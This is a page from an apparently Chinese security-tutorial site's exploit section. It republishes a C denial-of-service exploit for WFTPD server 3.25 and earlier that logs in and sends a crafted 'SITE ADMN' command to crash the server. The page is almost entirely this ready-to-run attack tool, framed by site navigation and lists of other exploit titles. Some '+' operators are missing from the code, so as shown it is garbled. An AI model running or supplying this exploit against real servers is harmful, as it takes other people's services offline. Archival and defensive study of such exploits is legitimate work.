• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > WFTPD Pro Server

WFTPD Pro Server

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了WFTPD Pro Server ,其中包含wftpd,wftpd32,wftpd32下载,wftpd64,wftpd32.exe等知识点,遇到此问题的同学们可以参考下
/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS *
* *
*Sending command SITE ADMN \32 makes server BOOM *
* *
*usage: wftpd_dos.exe ip port user pass *
* *
*Coded by Marsu <Marsupilamipowa@hotmail.fr> *
************************************************************************/ #include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[100];
int buflen=100; if (argc!=5)
{
printf("[ ] Usage: %s <ip> <port> <user> <pass>\n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("Failed\n[-] Socket error\n");
return 1;
} sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(atoi(argv[2]));
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sock_addr.sin_zero), '\0', 8);
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"USER ",5);
memcpy(evilbuff 5,argv[3],strlen(argv[3]));
memcpy(evilbuff 5 strlen(argv[3]),"\r\n\0",3);
printf("[ ] Sending USER ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"PASS ",5);
memcpy(evilbuff 5,argv[4],strlen(argv[4]));
memcpy(evilbuff 5 strlen(argv[4]),"\r\n\0",3); printf("[ ] Sending PASS ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"SITE ADMN ",10);
memset(evilbuff 10,32,1); //this char is powerfull :p
memcpy(evilbuff 10 1,"\r\n\0",3); printf("[ ] Sending SITE ADMN ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n"); printf("[ ] Host should be down\n");
return 0;
}
//http://www.leftworld.net
</div>

您可能想查找下面的文章:

  • WFTPD Pro Server

相关文章

  • NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
  • Mole Group Last Minute Script
  • Dreampics Builder (page) Remote SQL Injection Vulnerability
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit
  • Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
  • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Dana IRC 1.4a Remote Buffer Overflow Exploit
    • Ultra Office ActiveX Control Remote Buffer Overflow Exploit
    • Linux Kernel
    • MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
    • Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
    • MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
    • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
    • Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
    • fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
    • gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有